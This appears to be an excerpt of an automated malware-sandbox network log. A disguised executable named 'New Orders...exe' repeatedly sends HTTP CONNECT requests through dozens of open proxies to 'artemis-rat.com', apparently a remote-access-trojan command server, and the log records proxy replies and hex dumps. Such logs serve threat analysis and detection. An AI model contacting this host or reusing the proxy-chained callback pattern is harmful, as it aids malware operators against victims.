                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1802192.168.2.95103968.183.180.22231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.326931953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.460747004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.461203098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1803192.168.2.951042178.33.163.15619517672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.327073097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.460874081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.461208105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.476699114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.476203918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1804192.168.2.95495445.117.179.209807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.334515095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445247889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445389986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:13.513395071 CET79INHTTP/1.0 200 Connection Established
                                                                                        Proxy-agent: Apache/2.4.37 (AlmaLinux)


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1805192.168.2.95492741.65.46.18019817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.350387096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445250034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445394993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.445209026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.538803101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.632545948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.632579088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.633382082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:51.773392916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1806192.168.2.95504652.151.210.20490027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.353148937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1807192.168.2.954181172.67.181.37807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.371642113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.526453018 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:51 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1808192.168.2.95502060.188.102.225180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.371750116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1809192.168.2.951194132.148.167.243482987672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.371900082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445283890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445395947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1810192.168.2.95125750.63.12.3393677672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.372472048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445321083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445395947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.445323944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.538795948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1811192.168.2.95411245.117.179.179147917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.377691031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445282936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445395947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.445269108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.538801908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.633367062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.632570028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.633389950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1812192.168.2.954134122.53.82.12641457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.378235102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1813192.168.2.954111185.118.153.11080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.379374027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.592258930 CET202INHTTP/1.0 403 Forbidden
                                                                                        Content-Length: 719
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:03:13 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:03:13 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1814192.168.2.95422975.89.101.63807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.391805887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1815192.168.2.95141292.204.135.37348247672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.392038107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.460871935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.461203098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.476692915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.476244926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1816192.168.2.95124145.10.42.2031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.392565966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.445338964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445502043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.677175999 CET39INHTTP/1.0 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1817192.168.2.951403102.68.129.5480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.409776926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.902095079 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1818192.168.2.951265190.220.228.14780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.413908958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.465111971 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1819192.168.2.954938198.8.94.174390787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.414644957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1820192.168.2.954626142.54.239.141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.434712887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1821192.168.2.95296772.169.67.61877672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.441495895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.810180902 CET766INHTTP/1.0 514 Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported
                                                                                        Content-type: text/html
                                                                                        Content-length: 630
                                                                                        Data Raw: 3c 54 49 54 4c 45 3e 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 45 72 72 6f 72 20 28 35 31 34 29 20 2d 20 50 72 6f 78 69 65 64 20 48 54 54 50 53 20 52 65 71 75 65 73 74 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 54 49 54 4c 45 3e 3c 42 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 61 72 69 61 6c 20 63 6f 6c 6f 72 3d 23 33 36 34 32 61 32 3e 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 45 72 72 6f 72 20 28 35 31 34 29 20 2d 20 50 72 6f 78 69 65 64 20 48 54 54 50 53 20 52 65 71 75 65 73 74 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 66 6f 6e 74 3e 3c 2f 42 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 6e 6f 72 6d 61 6c 20 66 61 63 65 3d 61 72 69 61 6c 20 73 69 7a 65 3d 32 70 78 3e 3c 50 3e 54 68 65 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 73 65 63 75 72 65 20 72 65 71 75 65 73 74 73 20 28 48 54 54 50 53 29 20 66 72 6f 6d 20 61 20 62 72 6f 77 73 65 72 20 77 68 65 6e 3a 20 3c 50 3e 20 3c 55 4c 3e 3c 4c 49 3e 20 54 68 65 20 62 72 6f 77 73 65 72 20 69 73 20 70 72 6f 78 69 65 64 20 74 6f 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 66 6f 72 20 73 65 63 75 72 65 20 72 65 71 75 65 73 74 73 20 28 48 54 54 50 53 29 2c 20 61 6e 64 20 3c 4c 49 3e 20 54 68 65 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 77 69 74 68 20 61 20 70 72 6f 78 79 20 73 65 72 76 